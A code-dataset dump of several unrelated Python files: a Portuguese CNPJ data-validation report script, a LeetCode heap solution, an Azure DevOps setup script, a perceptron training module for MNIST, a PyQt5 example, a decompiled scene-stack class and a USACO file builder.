index=preenchimento_labels)\n tabela_review = tabela_review.rename_axis('Colunas', axis='columns')\n #tabela_review\n\n\n # In[14]:\n\n\n #Plota em gráfico de barras horizontal\n data = go.Bar(x = campos_validos, \n y = preenchimento_labels, \n orientation = 'h', \n marker = {'color' : '#3749E9'})\n\n layout = go.Layout(title = '', \n yaxis = {'title': ''}, \n xaxis = {'title': ''})\n\n fig = go.Figure(data = data, layout = layout)\n fig.update_yaxes(showline = True, linewidth = 1, linecolor = '#717171')\n fig.update_xaxes(showgrid = True, gridwidth = 1, gridcolor = '#D9D9DE')\n fig.update_layout({'plot_bgcolor': '#FFFFFF', 'paper_bgcolor': '#FFFFFF'})\n fig.update_layout(xaxis=dict(ticksuffix = '%'))\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_preenchimento.html\")\n\n\n # In[15]:\n\n\n #Separa por grupos os valores diferentes encontrados nas colunas de datas\n datas_inc = df[df['DAT_INC_DBO'] != 0]\n datas_inc = datas_inc.groupby('DAT_INC_DBO').count()\n datas_inc\n\n #Analisa os valores únicos encontrados e calcula a porcentagem de seu tamanho com o número de linhas da tabela\n conta = 0\n porcentagem = []\n for x in datas_inc.ID_STG_FNT_ITT:\n conta = x * 100 / len(df)\n porcentagem.append (conta)\n\n #Cria um dataframe\n datas_encontradas = pd.DataFrame({'Porcentagem': porcentagem},\n index=datas_inc.index)\n datas_encontradas = datas_encontradas.rename_axis('Datas Encontradas', axis='columns')\n datas_encontradas.index.name = None\n\n visualiza = 
(datas_encontradas\n .style\n .format({'Porcentagem':\"{:.2f}%\"})\n .applymap(destaque_coluna, subset=pd.IndexSlice[:, ['Porcentagem']]))\n write_to_html_file(visualiza, title='', filename=pasta + \"/fnt_tab_datas.html\")\n visualiza\n\n\n # # Analisa os CNPJs válidos desconsiderado linhas nulas, cnpjs inválidos e nomes idênticos\n\n # In[16]:\n\n\n #Agrupa por nomes idênticos\n nome_identico = df.groupby('NOM_RAZ_SCL').count().sort_values(by = 'NUM_CNPJ', ascending = False)\n\n #Depreza os nomes idênticos\n nome_identico = nome_identico[nome_identico['ID_STG_FNT_ITT'] > 1]\n\n #Adiciona a listas os CNPJs por nomes idênticos ou únicos\n cnpj_nome_identico = [df.NUM_CNPJ[x] for x in range (len (df)) if df.NOM_RAZ_SCL[x] in nome_identico.index]\n cnpj_c_nome_identico = [df.NUM_CMP_CNPJ[x] for x in range (len (df)) if df.NOM_RAZ_SCL[x] in nome_identico.index]\n cnpj_nome_unico = [df.NUM_CNPJ[x] for x in range (len (df)) if df.NOM_RAZ_SCL[x] not in nome_identico.index]\n cnpj_c_nome_unico = [df.NUM_CMP_CNPJ[x] for x in range (len (df)) if df.NOM_RAZ_SCL[x] not in nome_identico.index]\n\n\n # In[17]:\n\n\n #Analisa apenas os CNPJs cuja a linha da coluna NUM_CNPJ possui valor único\n cnpjList_nome_unico = [str(cnpj_nome_unico[c]) + str(cnpj_c_nome_unico[c]) for c in range (len(cnpj_nome_unico))]\n\n #Verifica o tamanho do CNPJ e adiciona a listas de validos ou inválidos, com mais ou com menos de 14 caracteres\n cnpj_valido_nome_unico = [cnpjList_nome_unico[c] for c in range (len(cnpjList_nome_unico)) if len(cnpjList_nome_unico[c]) == 14]\n cnpj_nao_valido = [cnpjList_nome_unico[c] for c in range (len(cnpjList_nome_unico)) if len(cnpjList_nome_unico[c]) != 14]\n cnpj_mais = [cnpjList_nome_unico[c] for c in range (len(cnpjList_nome_unico)) if len(cnpjList_nome_unico[c]) > 14]\n cnpj_menos = [cnpjList_nome_unico[c] for c in range (len(cnpjList_nome_unico)) if len(cnpjList_nome_unico[c]) < 14]\n\n #Analisa apenas os CNPJs cuja a linha da coluna NUM_CNPJ possui valores idênticos\n cnpjList_nome_identico = [str(cnpj_nome_identico[c]) + str(cnpj_c_nome_identico[c]) for c in range (len(cnpj_nome_identico))]\n\n #Verifica o tamanho do CNPJ e adiciona a listas de validos ou inválidos, com mais ou com menos de 14 caracteres\n cnpj_valido_nome_identico = [cnpjList_nome_identico[c] for c in range (len(cnpjList_nome_identico)) if len(cnpjList_nome_identico[c]) == 14]\n cnpj_nao_valido.extend([(cnpjList_nome_identico[c]) for c in range (len(cnpjList_nome_identico)) if len(cnpjList_nome_identico[c]) != 14])\n cnpj_mais.extend([(cnpjList_nome_identico[c]) for c in range (len(cnpjList_nome_identico)) if len(cnpjList_nome_identico[c]) > 14])\n cnpj_menos.extend([(cnpjList_nome_identico[c]) for c in range (len(cnpjList_nome_identico)) if len(cnpjList_nome_identico[c]) < 14])\n\n #len(cnpjList_nome_unico), len(cnpjList_nome_identico), len(cnpj_valido_nome_unico), len(cnpj_valido_nome_identico), \\\n #len(cnpj_nao_valido), len(cnpj_mais), len(cnpj_menos)\n\n\n # # Gráfico dos CNPJs Únicos\n\n # In[18]:\n\n\n #Plota em gráfico de setores\n cnpjs_unicos = len(np.unique(cnpj_valido_nome_unico)) + len(np.unique(cnpj_valido_nome_identico))\n cnpjs_identicos = len(cnpj_valido_nome_unico) + len(cnpj_valido_nome_identico) - cnpjs_unicos\n\n valores_unicos = cnpjs_unicos*100/(len(cnpj_valido_nome_unico) + len(cnpj_valido_nome_identico))\n valores_identicos = 100 - valores_unicos\n\n labels = ['CNJPs Validados Únicos', 'CNJPs Validados Idênticos']\n colors = ['#3749e9', '#112244']\n sizes = [valores_unicos, 
valores_identicos]\n explode = (0, 0.05)\n\n fig = go.Figure(data=[go.Pie(labels=labels, values=sizes)])\n fig.update_traces(marker=dict(colors=colors, line=dict(color='#000000', width=0)))\n fig.update_traces(texttemplate='%{percent:.2%f}')\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_cnpjs_unicos.html\")\n\n\n # # Gráfico de todos os CNPJs válidos desconsiderado linhas nulas, cnpjs inválidos e nomes idênticos\n\n # In[19]:\n\n\n #Plota em gráfico de setores\n cnpjs_unicos = len(np.unique(cnpj_valido_nome_unico))\n cnpjs_identicos = len(cnpj_valido_nome_unico) - cnpjs_unicos\n\n #CNPJs válidos\n conta = cnpjs_unicos\n valores_validos_unicos = (conta*100) / len(df)\n\n #CNPJs descartados, mas válidos\n conta = len(cnpj_valido_nome_identico) + cnpjs_identicos\n valores_validos_identicos = (conta*100) / len(df)\n\n #CNPJs não válidos\n conta = len(cnpj_nao_valido)\n valores_nao_validos = (conta*100) / len(df)\n\n labels = 'Válidos', 'Invalidados', 'Não válidos'\n colors = ['#00B7CC', '#3749e9', '#112244']\n sizes = [valores_validos_unicos, valores_validos_identicos, valores_nao_validos]\n explode = (0, 0.05, 0.05)\n\n fig = go.Figure(data=[go.Pie(labels=labels, values=sizes)])\n fig.update_traces(marker=dict(colors=colors, line=dict(color='#000000', width=0)))\n fig.update_traces(texttemplate='%{percent:.2%f}')\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_cnpjs_validos.html\")\n\n\n # # Gráfico de todos os CNPJs por número de carácteres\n\n # In[20]:\n\n\n #Plota em gráfico de setores\n # =14 Char\n exat_14_char = valores_validos_unicos + valores_validos_identicos\n\n # +14 Char\n conta = len(cnpj_mais)\n mais_14_char = (conta*100) / len (df)\n\n # -14 Char\n conta = len(cnpj_menos)\n menos_14_char = (conta*100) / len (df)\n\n labels = '+14 Caracteres', '-14 Caracteres', '14 Caracteres (Correto)'\n colors = ['#3749e9', '#112244', '#00B7CC']\n sizes = [mais_14_char, menos_14_char, exat_14_char]\n explode = (0.03, 0.03, 0.03)\n\n fig = go.Figure(data=[go.Pie(labels=labels, values=sizes)])\n fig.update_traces(marker=dict(colors=colors, line=dict(color='#000000', width=0)))\n fig.update_traces(texttemplate='%{percent:.2%f}')\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_cnpjs_caracteres.html\")\n\n\n # # Gráfico de Nomes Únicos\n\n # In[21]:\n\n\n #Plota em gráfico de setores\n nome_identico = nome_identico.ID_STG_FNT_ITT.sum()*100/len(df)\n nome_unico = 100 - nome_identico\n\n labels = ['Nomes Únicos', 'Nomes Idênticos']\n colors = ['#3749e9', '#112244']\n sizes = [nome_unico, nome_identico]\n explode = (0, 0.05)\n\n fig = go.Figure(data=[go.Pie(labels=labels, values=sizes)])\n fig.update_traces(marker=dict(colors=colors, line=dict(color='#000000', width=0)))\n fig.update_traces(texttemplate='%{percent:.2%f}')\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_nomes_unicos.html\")\n\n\n # # Indicadores de Validação\n\n # In[22]:\n\n\n #Calcula a média de preenchimento da remessa\n media_preenchimento = sum (campos_validos) / df.shape[1]\n\n #Calcula de validação\n media_validacao = valores_validos_unicos\n\n #media_preenchimento, media_validacao\n\n html_string = '''\n\n\n\n \n \n METAlitcs - STG_FNT_ITT\n \n \n\n\n\n
METAlitcs
Validação das Tabelas
STG_FNT_ITT

Validação das Tabelas
STG_FNT_ITT
STG_MVT_CRD
STG_OPR_ITT
STG_PGT

Resultados da Remessa
Movimentações
Operações
Pagamentos

Índice de Pagamentos em Dia
Por Modalidades

Índice de Número de Pagamentos por Clientes
Por Faixas de Valores

Validade da Tabela
''' + str(int(media_validacao)) + '''%

Média de Preenchimento da Tabela
''' + str(int(media_preenchimento)) + '''%

Verificação de Campos Não Nulos
Porcentagem de campos preenchidos por colunas

Datas Encontradas
Porcentagem de campos preenchidos nas colunas DAT_INC_DBO e DAT_RSS_FNT_ITT

Validação dos Tipos de Dados
Porcentagem de campos preenchidos por colunas

Definição das Colunas com Dados Sensíveis
Porcentagem de campos preenchidos por colunas

Validação de Dados idênticos
Porcentagem de campos preenchidos por colunas

Validade Geral da Tabela
Porcentagem de campos de CNPJs válidos (somente linhas com Razões Sociais Únicas), invalidados (inclui CNPJs válidos, mas em linhas com Razões Sociais Idênticas) e não válidos (CNPJs com mais ou menos de 14 caracteres)

CNPJs Únicos x idênticos
Porcentagem de campos com dados únicos x idênticos

Contagem de Caracteres dos CNPJs
Porcentagem de campos com 14 caracteres, mais de 14 e menos de 14 da soma das colunas NUM_CNPJ e NUM_COMP

Razão Social Únicos x Idênticos
Porcentagem de campos com dados únicos x idênticos
\n\n\n'''\n\n f = open(relatorio + '/table_FNT.html','w', encoding='utf-8')\n f.write(html_string)\n f.close()\n\n print(f\"O Relatório de Validação da Tabela STG_FNT_ITT foi criado com sucesso!\")\n","sub_path":"SPRINT 5/codigos_desenvolvidos/fontes.py","file_name":"fontes.py","file_ext":"py","file_size_in_byte":24356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"242028771","text":"# O(Nlogk) run-time and O(k) space-complexity.\nclass Solution:\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n counts = collections.Counter(nums)\n heap = [counts.popitem()[::-1] for _ in range(k)]\n heapq.heapify(heap)\n for key, val in counts.items():\n if val > heap[0][0]:\n heapq.heapreplace(heap, (val, key))\n return sorted([x[1] for x in heap])\n \n","sub_path":"PriorityQueue/347_top_k_frequent_elements.py","file_name":"347_top_k_frequent_elements.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"424021353","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport sys\nimport os\nfrom subprocess import check_call, CalledProcessError\n\nroot_dir = os.path.abspath(os.path.join(os.path.abspath(__file__), '..', '..'))\n\nprint('Running dev setup...')\nprint('Root directory \\'{}\\'\\n'.format(root_dir))\n\ndef exec_command(command):\n try:\n print('Executing: ' + command)\n check_call(command.split(), cwd=root_dir)\n print()\n except CalledProcessError as err:\n print(err, file=sys.stderr)\n sys.exit(1)\n\n# install general requirements and azure-cli\nexec_command('python -m pip install --upgrade pip')\n\nif os.path.isfile('./requirements.txt'):\n exec_command('pip install -r requirements.txt')\n\n# upgrade to latest az-dev-cli\nexec_command(r'pip install --upgrade .\\azure-devops-extension')\n","sub_path":"scripts/dev_setup.py","file_name":"dev_setup.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"38322955","text":"from __future__ import print_function\nimport numpy as np\nimport sys\nimport copy\nimport time\nimport os\nimport amitgroup as ag\nimport pickle\n\n\n\n\ndef top_train(expi):\n\n \"\"\"\n Call two types of network training. One which\n updates perceptrons of one class against the rest\n and then moves on to other classes. The second which\n updates all the perceptrons at each iteration (this\n is more natural). The first will probably be removed at somepoint.\n\n Parameters\n ----------\n\n The input is an `experiment' class that has the training\n and test data as submembers (.ddtr, .ddte) a list of lists.\n len(ddtr) is number of classes. For each class len(ddtr[c]) is\n number of training points. If exp.pp.numtrain_per_class>0 then\n exactly that number of training points per class are used.\n exp.pp.slant=1 - deslant the digits.\n exp.out = output file for some printouts.\n exp.pp = parameter class for network training, stochastic svm training, part training. 
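Key pp fields for the network rules (defaults from pars()): pltp = pltd = 0.01 are the stochastic LTP/LTD probabilities, deltaP = deltaD = 5. the potentiation/depression margins around the firing threshold theta, and Jmax = 2 the synaptic ceiling.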
(TODO break pp into sub parameter classes)\n\n Returns\n -------\n\n The function add a list of lists of network classes into the input class and doesn't return anything. List length is number of classes.\n For each class list length is number of perceptrons. Each perceptron\n synapse matrix is given by a network class.\n\n \"\"\"\n expi.NO=[]\n if expi.pp.type==0:\n expi.NO.append(train_net(expi))\n else:\n expi.NO.append(all_at_one_top(expi))\n\n [C,e]=test_averages(expi)\n print(\"Test classification rate \", e)\n print(\"Finished Training\")\n\n\n\ndef extract_feature_matrix(ddt,s,num=0):\n\n \"\"\"\n\n Create one feature array from the features of a list of images.\n The feature for each image is flattened and added as a row of the array.\n\n Parameters\n ----------\n\n ddt - The list of images. s - a string denoting which level of features to use.\n (For now we only have V1)\n num=0 - number of images to extract if not all of them.\n\n Returns\n -------\n\n Returns the features array.\n\n \"\"\"\n\n if (num==0):\n l=len(ddt)\n else:\n l=num\n numfeat=ddt[0].features[s].size\n MM=np.zeros((l,numfeat), dtype=np.ubyte)\n i=0\n for i in range(l):\n MM[i,:]=ddt[i].features[s].flatten()\n return MM\n\ndef read_data_b(expi,numclass):\n\n \"\"\"\n\n Read training and test images from path 's' and process them for features\n put result in expi.ddtr, expi.ddte.\n\n if expi.pp.numtrain_per_class>0 extract exactly that number of training\n examples for each class. Otherwise just take first exp.pp.numtrain exaples\n from training et.\n if expi.pp.slant=1 deslant the images.\n\n Parameters\n ----------\n\n s-path, expi-experiment, numclass- number of classes.\n\n Returns\n -------\n\n Nothing.\n\n \"\"\"\n\n print('Hello')\n s=os.environ['HOME']+'/Desktop/Dropbox/'\n sstr=s+'/mnist_train'\n sste=s+'/mnist_test'\n expi.ddtr=[]\n expi.ddte=[]\n for i in range(numclass):\n bb=[]\n expi.ddtr.append(bb)\n cc=[]\n expi.ddte.append(cc)\n\n if (expi.pp.numtrain_per_class==0):\n for i in range(expi.pp.numtrain):\n tim=ag.io.load_imagep(sstr,i,True)\n tim.img=ag.io.process_im(tim.img, expi.pp.slant, expi.pp.DIM)\n feat=ag.features.bedges(np.double(tim.img),5,'box',expi.pp.spread)\n tim.features={'V1': feat}\n tr=tim.truth\n expi.ddtr[tr].append(tim)\n else:\n for c in range(numclass):\n i=0\n while len(expi.ddtr[c])expi.pp.theta\n H[:,d]=np.sum(temp,1)\n i=np.argmax(H,1);\n for d in range(numclass):\n CONF[c,d]=np.double(np.sum(i==d))\n\n print(np.sum(np.diag(CONF))/Ntot)\n return CONF\n\n\n\n \ndef train_net(expi):\n\n \"\"\"\n\n Train each class separately. 
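(one-vs-rest: the class's own examples act as positives and the pooled examples of all other classes as negatives.)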
So rerun over everything numclass times.\n This will probably be phased out.\n\n Paremters\n ---------\n\n expi - experiment.\n\n Returns\n -------\n\n Returns list of perceptrons (numperc) \n\n \"\"\"\n f = open(expi.pp.out,'w')\n numclass=len(expi.ddtr)\n CI=range(numclass)\n #np.random.shuffle(CI)\n NO=[None]*numclass\n for c in CI:\n f.write(str(CI[c])+'\\n')\n NO[CI[c]]=ff_mult_top(f,expi.pp,expi.ddtr,CI[c],expi.pp.numperc, expi.pp.numtrain_per_class)\n\n return NO\n\ndef stack_data(expi):\n numclass=len(expi.ddtr)\n N=expi.pp.numtrain_per_class\n if N==0:\n N=len(expi.ddtr[0])\n # Get the full data matrix for class 0\n X=extract_feature_matrix(expi.ddtr[0],'V1',N)\n Y=np.zeros((N,1), dtype=np.ubyte)\n # Stack up the data matrices for the other classes.\n for c in range(1,numclass):\n N=expi.pp.numtrain_per_class\n if N==0:\n N=len(expi.ddtr[c])\n print('Loading class ', c, N)\n X=np.vstack((X,extract_feature_matrix(expi.ddtr[c],'V1',N)))\n Y=np.vstack((Y,c*np.ones((N,1))))\n return X,Y\n\ndef all_at_one_top(expi):\n\n \"\"\"\n\n Train everything together. Each data point triggers\n potentiatiation of perceptrons of its class and depression\n on perceptrons of ALL other classes.\n\n Parameters\n ----------\n\n expi - experiment. \n expi.pp.numperc - number of perceptrons per class\n expi.pp.numtrain_per_class>0 - number of training data per class.\n\n Returns\n ------\n\n List of lists of perceptrons (one list for each class.)\n\n \"\"\"\n # stack data of all classes in one array, with an accompanying label array\n print('Going to stack')\n [X,Y]=stack_data(expi)\n # Call the training routine\n numclass=len(expi.ddtr)\n NN=ff_all_at_one(expi.pp,X,Y,expi.pp.numperc,numclass)\n return NN\n \ndef ff_all_at_one(pp,X,Y,numperc,numclass):\n\n \"\"\"\n\n Actually loop through a random ordering of the data\n and potentiate synapses to perceptron of same class \n depress synapses to perceptrons of other classes and\n potentiate feedback synapses for same class from perceptron to features.\n\n Parameters\n ----------\n\n out - file name for some printouts\n pp - parameters of learning (pltp, pltd, deltaP, deltaD\n X - feature data\n Y - class labels\n numperc - number of perceptrons per class\n numclass - number of classes.\n\n Returns\n -------\n\n List of list of perceptrons.\n\n \"\"\"\n\n #sys.stdout = open('out','w')\n Ntot=X.shape[0]\n numfeat=X.shape[1]\n print(Ntot, numfeat)\n\n # Synapses are positive and Jmid is the `middle'. Instead of being symmetric around 0.\n Jmid=np.ceil(pp.Jmax/2)\n # Feed forward synspases - initial value 1 -> 0.\n J=[]\n Jfb=[]\n for c in range(numclass):\n J.append(np.ones((numfeat,numperc), dtype=np.int8)*Jmid)\n # Feedback synapses\n Jfb.append(np.ones((numfeat,numperc), dtype=np.int8)*Jmid)\n # Iterate\n II=range(Ntot)\n h=np.zeros(numperc)\n rnumclass=range(numclass)\n rNtot=range(Ntot)\n for it in range(pp.numit):\n print('iteration ', it)\n # Random arrangement of examples. 
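# A fresh shuffle at the start of every epoch keeps consecutive updates decorrelated.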
Stochastic gradient.\n np.random.shuffle(II)\n # Variables to keep track of changes\n up=0\n down=0\n # Loop over examples\n for i in rNtot:\n ii=II[i]\n XI=X[ii,:]==1\n XIz=X[ii,:]==0\n # Prepare for matrix multiplication.\n \n # Field at each perceptron for this class.\n \n for c in rnumclass:\n h=(np.dot(X[ii,:],J[c]-Jmid)).T\n #h.shape=[1,numperc] \n if Y[ii]==c:\n # Update in up direction.\n up+=potentiate_ff(pp,h,XI,J[c],Jmid)\n Jfb[c]=modify_fb(pp,XI,XIz,Jfb[c],Jmid)\n else:\n down+=depress_ff(pp,h,XI,J[c],Jmid)\n # up+down\n #f.write('updown '+str(np.double(up)+np.double(down))+'\\n')\n \n N=[]\n for c in range(numclass):\n NN=[]\n for p in range(numperc):\n NN.append(netout(J[c][:,p],Jfb[c][:,p]))\n N.append(NN)\n \n return N \n\n\n\ndef modify_fb(pp,XI,XIz,Jfb,Jmid):\n\n \"\"\"\n\n Potentiate or depress the feedback synapses.\n\n Parameters:\n ----------\n\n pp - learning parameters.\n XI - Which features are on.\n XIz - Which features are off.\n Jfb - array of synaptic values.\n Jmid = pp.Jmax/2\n\n Returns\n -------\n\n Returns update synaptic value array.\n\n \"\"\"\n # All feedback synapses connected to active features can be potentiated if less than max.\n\n XI.shape=XI.size\n temp=Jfb[XI,:]\n IJ=temp0\n g=temp[IJ]\n g-=np.random.rand(g.size)=pp.theta-pp.deltaD;\n if (len(np.nonzero(hii)[0])==0):\n return 0\n # Logical matrix of all synapses that can be depressed ...above depression threshold\n # and the feature is on. (Synapses with off features don't create a change.)\n imat=np.outer(XI,hii)\n if (len(J.shape)==1):\n imat=imat.flatten()\n\n Jh=J[imat];\n # If greater than minimal synaptic value\n IJ=Jh>0\n g=Jh[IJ]\n # Modify with stochastic ltd probability.\n RR=(np.random.rand(g.size)0:\n n=min(numtrain,len(dd[c]))\n\n XY.append(extract_feature_matrix(dd[c],'V1',n))\n\n\n N=XY[0].shape[0]\n\n for ii in ic:\n n=len(dd[ii])\n if numtrain>0:\n n=min(numtrain,len(dd[ii]))\n XY[0]=np.vstack((XY[0],extract_feature_matrix(dd[ii],'V1',n)))\n\n \n Ntot=XY[0].shape[0]\n Nbgd=Ntot-N\n XY.append(np.vstack((np.ones((N,1), dtype=np.ubyte),np.zeros((Nbgd,1), dtype=np.int8))))\n\n return XY\n\n\n# Train the network for each class.\ndef ff_mult_top(f,pp,ddtr,c,numperc, numtrain=0):\n if numtrain==0:\n numtrain=len(ddtr[c])\n # Rearrange data for this class with class at top of array and all the rest after.\n XY=rearrange(ddtr,c, numtrain)\n # Train class against the rest perceptron/s\n NO=ff_mult(pp,XY, numperc,f) \n return NO\n\ndef ff_mult(pp,XY,numperc,f):\n\n # Features\n X=XY[0]\n # Labels 1/0\n Y=XY[1]\n Ntot=X.shape[0]\n numfeat=X.shape[1]\n\n\n # Simple learing rule or field learning rule.\n # Synapses are positive and Jmid is the `middle'. Instead of being symmetric around 0.\n Jmid=np.ceil(pp.Jmax/2)\n # Feed forward synspases - initial value 1 -> 0.\n J=np.ones((numfeat,numperc))*Jmid\n # Feedback synapses\n Jfb=np.ones((numfeat,numperc))*Jmid\n II=range(Ntot)\n # Iterate\n for it in range(pp.numit):\n # Random arrangement of examples. 
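# Same per-example update scheme as ff_all_at_one, here restricted to a single one-vs-rest class.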
Stochastic gradient.\n np.random.shuffle(II)\n # Variables to keep track of changesi\n up=0\n down=0\n # Loop over examples\n for i in range(Ntot):\n ii=II[i]\n # Field at each perceptron for this class.\n h=np.dot(X[ii,:],J-Jmid)\n # Set of active input features\n XI=X[ii,:]==1\n XIz=X[ii,:]==0\n # Prepare for matrix multiplication.\n h.shape=[1,numperc]\n # A class example\n if (Y[ii]==1):\n # Update in up direction.\n up+=potentiate_ff(pp,h,XI,J,Jmid)\n Jfb=modify_fb(pp,XI,XIz,Jfb,Jmid)\n else:\n # Update in down direction.\n down+=depress_ff(pp,h,XI,J,Jmid)\n # Report fraction of modified synapses (potentiated, depressed)\n f.write('updown '+str(np.double(up)+np.double(down))+'\\n')\n if up+down==0:\n break\n N=[]\n for p in range(numperc):\n N.append(netout(J[:,p],Jfb[:,p]))\n return N\n\n\nclass pars:\n \n d=None\n N=None\n Jmax=None\n pobj=None\n numit=None\n pltp=None\n pltd=None\n pinc=None\n stoch=None\n nofield=None\n theta=None\n deltaP=None\n deltaD=None\n pt=None\n sh=None\n min_edges=None\n part_size=None\n spread=None\n slant=None\n type=None\n numperc=None\n numtrain=None\n numtrain_per_class=None\n DIM=None\n out=None\n numparts=None\n\n def __init__(self):\n self.d=7200\n self.N=1000\n self.Jmax=2\n self.pobj=.5\n self.numit=5\n self.pltp=.01\n self.pltd=.01\n self.stoch=1\n self.nofield=0\n self.theta=0\n self.deltaP=5.\n self.deltaD=5.\n self.pt=0\n self.showing=100000\n self.min_edges=40\n self.part_size=7\n self.pinc=1\n self.spread=2\n self.special_class=-1\n self.reduction_factor=.9\n self.numperc=1\n self.numtrain=0\n self.numtrain_per_class=100\n self.type=1\n self.slant=1\n self.DIM=0\n self.out='out'\n self.numparts=0\n \n def write(self,f):\n pickle.dump(self,f)\n\n def write(self,s):\n f=open(s,'w')\n pickle.dump(self,f)\n f.close()\n\n def read(self,f):\n self=pickle.load(f)\n return self\n\n def read(self,s):\n f=open(s,'r')\n self=pickle.load(f)\n f.close()\n return self\n \ndef compress_nets(NN):\n\n for Nc in NN:\n for P in Nc:\n P.JJ=np.ubyte(P.JJ)\n\n \nclass experiment:\n ddtr=[]\n ddte=[]\n pp=[] \n NO=[]\n def __init__(self):\n self.pp=pars()\n \n \n def ecopy(self,ine):\n self.ddtr=ine.ddtr\n self.ddte=ine.ddte\n self.pp=copy.copy(ine.pp)\n\n def write_pars(self,s):\n self.pp.write(s)\n\n def read_pars(self,s):\n pr=pars()\n pr=pr.read(s)\n self.pp=pr\n \nclass netout:\n JJ=[];\n JJfb=[];\n def __init__(self,J,Jfb):\n self.JJ=np.ubyte(J)\n self.JJfb=np.ubyte(Jfb)\n\n\nclass modell:\n NN=[]\n par=[]\n def __init__(self,N,pp):\n self.NN=N\n self.par=pp\n \n \n\n\n \n \n\n\n","sub_path":"amitgroup/net/train_net.py","file_name":"train_net.py","file_ext":"py","file_size_in_byte":21053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"312258611","text":"\r\nimport sys\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\r\n\r\n\r\nclass Window(QWidget):\r\n \r\n def __init__(self):\r\n \r\n super().__init__()\r\n self.initUi()\r\n \r\n self.show()\r\n \r\n \r\n def initUi(self):\r\n \r\n self.setGeometry(500, 250, 400, 300)\r\n \r\n self.button = QPushButton('Signal test', self)\r\n self.button.setGeometry(160, 110, 80, 30)\r\n self.button.clicked.connect(self.on_button_clicked)\r\n \r\n \r\n def on_button_clicked(self):\r\n print('Button clicked')\r\n \r\n \r\n\r\n\r\ndef main(args):\r\n \r\n app = QApplication(args)\r\n window = Window()\r\n sys.exit(app.exec_())\r\n \r\n\r\nif __name__ == '__main__':\r\n 
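# Hand the command-line arguments to Qt and run the application event loop.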
main(sys.argv)\r\n","sub_path":"PyQt5-Examples/02_signals_and_slots/signals_slots.py","file_name":"signals_slots.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"308899382","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/bezel/graphics/stage.py\n# Compiled at: 2009-02-25 04:20:27\nfrom bezel.graphics.containers import Bin\n\nclass Stage(Bin):\n\n def __init__(self):\n super(Stage, self).__init__()\n self.scene_stack = []\n\n def update_child(self):\n if self.child is not None:\n self.child.deactivate()\n self.child.stage = None\n child = self.scene_stack[(-1)]\n child.stage = self\n self.child = child\n self.child.activate()\n self.invalidate()\n return\n\n def push(self, child):\n self.scene_stack.append(child)\n self.update_child()\n\n add = push\n\n def pop(self):\n assert len(self.scene_stack) > 0\n self.scene_stack.pop()\n self.update_child()\n\n def replace(self, child):\n self.scene_stack.pop()\n self.push(child)","sub_path":"pycfiles/bezel-1.0dev_r162-py2.5/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"77762138","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function\n\nimport argparse\nimport os\n\narena_run_dir = os.path.expanduser('~/program/arena/tmp/arena')\nmain_file = os.path.join(arena_run_dir, 'release/Main.java')\nusaco_file = os.path.join(arena_run_dir, 'usaco/{}.java')\n\nhead_lines = '''\n/*\nID: paohui81\nLANG: JAVA\nPROG: {}\n*/\n'''\n\n\ndef build_args():\n parser = argparse.ArgumentParser(description='build usaco file')\n\n parser.add_argument('usaco_name', help='usaco name')\n\n args = parser.parse_args()\n return args\n\n\ndef build_usaco_file(usaco_name):\n with open(main_file) as input_fp, open(usaco_file, 'w') as output_fp:\n output_fp.write(head_lines)\n for line in input_fp:\n line = line.replace('System.in', 'new FileInputStream(\"{}.in\")'.format(usaco_name))\n line = line.replace('System.out', 'new FileOutputStream(\"{}.out\")'.format(usaco_name))\n line = line.replace('Main', '{}'.format(usaco_name))\n line = line.replace('main(String[] args)', 'main(String[] args) throws IOException')\n output_fp.write(line)\n\n\ndef main():\n args = build_args()\n usaco_name = args.usaco_name\n global usaco_file, head_lines\n usaco_file = usaco_file.format(usaco_name)\n head_lines = head_lines.format(usaco_name)\n print(usaco_file)\n\n usaco_dir = os.path.dirname(usaco_file)\n if not os.path.isdir(usaco_dir):\n os.makedirs(usaco_dir)\n\n build_usaco_file(usaco_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"libs/tools/build_usaco_file.py","file_name":"build_usaco_file.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"502156362","text":"#! 
